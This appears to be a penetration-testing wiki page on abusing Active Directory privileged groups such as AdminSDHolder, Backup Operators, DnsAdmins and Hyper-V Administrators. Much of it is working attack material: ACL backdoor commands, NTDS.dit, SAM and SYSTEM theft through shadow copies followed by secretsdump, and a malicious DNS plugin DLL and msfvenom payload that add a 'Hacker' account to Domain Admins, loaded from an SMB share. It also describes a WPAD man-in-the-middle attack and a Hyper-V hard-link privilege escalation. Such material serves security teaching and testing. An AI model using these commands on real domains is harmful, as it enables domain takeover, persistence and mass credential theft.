# Privileged Groups
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## Known groups with administration privileges
* **Administrators**
* **Domain Admins**
* **Enterprise Adminspr**
There are other account memberships and access token privileges that can also be useful during security assessments when chaining multiple attack vectors.
## AdminSDHolder group
The Access Control List (ACL) of the **AdminSDHolder** object is used as a template to **copy** **permissions** to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.\
By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group **AdminSDHolder** for example giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group (in an hour).\
And if someone tries to delete this user from the Domain Admins (for example) in an hour or less, the user will be back in the group.
Add a user to the **AdminSDHolder** group:
```csharp
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
```
Check if the user is inside the **Domain Admins** group:
```
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
```
If you don't want to wait an hour you can use a PS script to make the restore happen instantly: [https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1)
[**More information in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)
## Account Operators
* Allows creating non administrator accounts and groups on the domain
* Allows logging in to the DC locally
Note the spotless' user membership:
![](<../../.gitbook/assets/1 (2) (1) (1).png>)
However, we can still add new users:
![](../../.gitbook/assets/a2.png)
As well as login to DC01 locally:
![](../../.gitbook/assets/a3.png)
## Server Operators
This membership allows users to configure Domain Controllers with the following privileges:
* Allow log on locally
* Back up files and directories
* ``[`SeBackupPrivilege`](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#sebackupprivilege-3.1.4) and [`SeRestorePrivilege`](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#serestoreprivilege-3.1.5)
* Change the system time
* Change the time zone
* Force shutdown from a remote system
* Restore files and directories
* Shut down the system
* control local services
### Domain Controller Access
Note how we cannot access files on the DC with current membership:
![](../../.gitbook/assets/a4.png)
However, if the user belongs to `Server Operators`:
![](../../.gitbook/assets/a5.png)
The story changes:
![](../../.gitbook/assets/a6.png)
### Privesc
Use [`PsService`](https://docs.microsoft.com/en-us/sysinternals/downloads/psservice) or `sc`, form Sysinternals, to check permissions on a service.
```
C:\> .\PsService.exe security AppReadiness
PsService v2.25 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
[...]
[ALLOW] BUILTIN\Server Operators
All
```
This confirms that the Server Operators group has [SERVICE\_ALL\_ACCESS](https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights) access right, which gives us full control over this service.\
You can abuse this service to [**make the service execute arbitrary commands**](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#modify-service-binary-path) and escalate privileges.
## Backup Operators
As with `Server Operators` membership, we can **access the `DC01` file system** if we belong to `Backup Operators`.
This is because this group grants its **members** the [**`SeBackup`**](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#sebackupprivilege-3.1.4) and [**`SeRestore`**](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#serestoreprivilege-3.1.5) privileges. The **SeBackupPrivilege** allows us to **traverse any folder and list** the folder contents. This will let us **copy a file from a folder,** even if nothing else is giving you permissions. However, to abuse this permissions to copy a file the flag [**FILE\_FLAG\_BACKUP\_SEMANTICS**](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) **** must be used. Therefore, special tools are needed.
For this purpose you can use [**these scripts**](https://github.com/giuliano108/SeBackupPrivilege)**.**
### **Local Attack**
```bash
# Import libraries
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Get-SeBackupPrivilege # ...or whoami /priv | findstr Backup SeBackupPrivilege is disabled
# Enable SeBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege
# List Admin folder for example and steal a file
dir C:\Users\Administrator\
Copy-FileSeBackupPrivilege C:\Users\Administrator\\report.pdf c:\temp\x.pdf -Overwrite
```
### AD Attack
For instance, you can directly access the Domain Controller file system:
![](../../.gitbook/assets/a7.png)
You can abuse this access to **steal** the active directory database **`NTDS.dit`** to get all the **NTLM hashes** for all user and computer objects in the domain.
Using [**diskshadow**](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) you can **create a shadow copy** of the **`C` drive** and in the `F` drive for example. The, you can steal the `NTDS.dit` file from this shadow copy as it won't be in use by the system:
```
diskshadow.exe
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 10/14/2020 10:34:16 AM
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% F:
DISKSHADOW> end backup
DISKSHADOW> exit
```
As in the local attack, you can now copy the privileged file **`NTDS.dit`**:
```
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
```
Another way to copy files is using [**robocopy**](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy)**:**
```
robocopy /B F:\Windows\NTDS .\ntds ntds.dit
```
Then, you can easily **steal** the **SYSTEM** and **SAM**:
```
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
```
Finally you can **get all the hashes** from the **`NTDS.dit`**:
```shell-session
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```
## Print Operators
The members of this gorup are granted:
* [**`SeLoadDriverPrivilege`**](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#seloaddriverprivilege-3.1.7)
* **Log on locally to a Domain Controller** and shut it down
* Permissions to **manage**, create, share, and delete **printers connected to a Domain Controller**
{% hint style="warning" %}
If the command `whoami /priv`, doesn't show the **`SeLoadDriverPrivilege`** from an unelevated context, you need to bypass UAC.
{% endhint %}
Check in this page how to abuse the SeLoadDriverPrivilege to privesc:
{% content-ref url="../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/abuse-seloaddriverprivilege.md" %}
[abuse-seloaddriverprivilege.md](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/abuse-seloaddriverprivilege.md)
{% endcontent-ref %}
## DnsAdmins
A user who is member of the **DNSAdmins** group or have **write privileges to a DNS** server object can load an **arbitrary DLL** with **SYSTEM** privileges on the **DNS server**.\
This is really interesting as the **Domain Controllers** are **used** very frequently as **DNS servers**.
As shown in this **** [**post**](https://adsecurity.org/?p=4064), the following attack can be performed when DNS is run on a Domain Controller (which is very common):
* DNS management is performed over RPC
* [**ServerLevelPluginDll**](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-dnsp/c9d38538-8827-44e6-aa5e-022a016ed723) allows us to **load** a custom **DLL** with **zero verification** of the DLL's path. This can be done with the `dnscmd` tool from the command line
* When a member of the **`DnsAdmins`** group runs the **`dnscmd`** command below, the `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll` registry key is populated
* When the **DNS service is restarted**, the **DLL** in this path will be **loaded** (i.e., a network share that the Domain Controller's machine account can access)
* An attacker can load a **custom DLL to obtain a reverse shell** or even load a tool such as Mimikatz as a DLL to dump credentials.
### Execute arbitrary DLL
Then, if you have a user inside the **DNSAdmins group**, you can make the **DNS server load an arbitrary DLL with SYSTEM privileges** (DNS service runs as `NT AUTHORITY\SYSTEM`). You can make the DNS server load a **local or remote** (shared by SMB) DLL file executing:
```
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
```
An example of a valid DLL can be found in [https://github.com/kazkansouh/DNSAdmin-DLL](https://github.com/kazkansouh/DNSAdmin-DLL). I would change the code of the function `DnsPluginInitialize` to something like:
```c
DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
{
system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
}
```
Or you could generate a dll using msfvenom:
```bash
msfvenom -p windows/x64/exec cmd='net group "domain admins" /add /domain' -f dll -o adduser.dll
```
So, when the **DNSservice** start or restart, a new user will be created.
Even having a user inside DNSAdmin group you **by default cannot stop and restart the DNS service.** But you can always try doing:
```csharp
sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns
```
[**Learn more about this privilege escalation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise)
#### Mimilib.dll
As detailed in this [**post**](http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html), It's also possible to use [**mimilib.dll**](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib) from the creator of the `Mimikatz` tool to gain command execution by **modifying** the [**kdns.c**](https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c) **** file to execute a **reverse shell** one-liner or another command of our choosing.
### WPAD Record for MitM
Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names.
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.\
## **AD Recycle Bin**
This group gives you permission to read deleted AD object. Something juicy information can be found in there:
```bash
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
#You need to be in the "AD Recycle Bin" group of the AD to list the deleted AD objects
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
## Event Log Readers
Members of the [**Event Log Readers**](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#event-log-readers) **** group have **permission to access the event logs** generated (such as the new process creation logs). In the logs **sensitive information** could be found. Let's see how to visualize the logs:
```powershell
# To find "net [...] /user:blahblah password"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
# Using other users creds
wevtutil qe Security /rd:true /f:text /r:share01 /u: /p: | findstr "/user"
# Search using PowerShell
Get-WinEvent -LogName security [-Credential $creds] | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
```
## Hyper-V Administrators
The [**Hyper-V Administrators**](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#hyper-v-administrators) group has full access to all [Hyper-V features](https://docs.microsoft.com/en-us/windows-server/manage/windows-admin-center/use/manage-virtual-machines). If **Domain Controllers** have been **virtualized**, then the **virtualization admins** should be considered **Domain Admins**. They could easily **create a clone of the live Domain Controller** and **mount** the virtual **disk** offline to obtain the **`NTDS.dit`** file and extract NTLM password hashes for all users in the domain.
It is also well documented on this [blog](https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/), that upon **deleting** a virtual machine, `vmms.exe` attempts to **restore the original file permissions** on the corresponding **`.vhdx` file** and does so as `NT AUTHORITY\SYSTEM`, without impersonating the user. We can **delete the `.vhdx`** file and **create** a native **hard link** to point this file to a **protected SYSTEM file**, and you will be given full permissions to.
If the operating system is vulnerable to [CVE-2018-0952](https://www.tenable.com/cve/CVE-2018-0952) or [CVE-2019-0841](https://www.tenable.com/cve/CVE-2019-0841), we can leverage this to gain SYSTEM privileges. Otherwise, we can try to **take advantage of an application on the server that has installed a service running in the context of SYSTEM**, which is startable by unprivileged users.
### **Exploitation Example**
An example of this is **Firefox**, which installs the **`Mozilla Maintenance Service`**. We can update [this exploit](https://raw.githubusercontent.com/decoder-it/Hyper-V-admin-EOP/master/hyperv-eop.ps1) (a proof-of-concept for NT hard link) to grant our current user full permissions on the file below:
```bash
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
```
#### **Taking Ownership of the File**
After running the PowerShell script, we should have **full control of this file and can take ownership of it**.
```bash
C:\htb> takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
```
#### **Starting the Mozilla Maintenance Service**
Next, we can replace this file with a **malicious `maintenanceservice.exe`**, **start** the maintenance **service**, and get command execution as SYSTEM.
```
C:\htb> sc.exe start MozillaMaintenance
```
{% hint style="info" %}
This vector has been mitigated by the March 2020 Windows security updates, which changed behavior relating to hard links.
{% endhint %}
## Group Managed Service Accounts (gMSA)
In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced **Managed Service Accounts:**
* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date.
* It is uses Microsoft Key Distribution Service (KDC) to create and manage the passwords for the gMSA.
* It cannot be lock out or use for interactive login
* Supports to share across multiple hosts
* Can use to run schedule tasks (Managed service accounts do not support to run schedule tasks)
* Simplified SPN Management – System will automatically change the SPN value if **sAMaccount** details of the computer change or DNS name property change.
gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example.
![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../../.gitbook/assets/asd1.png)
So, if gMSA is being used, find if it has **special privileges** and also check if you have **permissions** to **read** the password of the services.
Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.
## References
{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges" %}
{% embed url="https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/" %}
{% embed url="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory" %}
{% embed url="https://docs.microsoft.com/en-us/windows/desktop/secauthz/enabling-and-disabling-privileges-in-c--" %}
{% embed url="https://adsecurity.org/?p=3658" %}
{% embed url="http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/" %}
{% embed url="https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/" %}
{% embed url="https://rastamouse.me/2019/01/gpo-abuse-part-1/" %}
{% embed url="https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13" %}
{% embed url="https://github.com/tandasat/ExploitCapcom" %}
{% embed url="https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp" %}
{% embed url="https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys" %}
{% embed url="https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e" %}
{% embed url="https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html" %}
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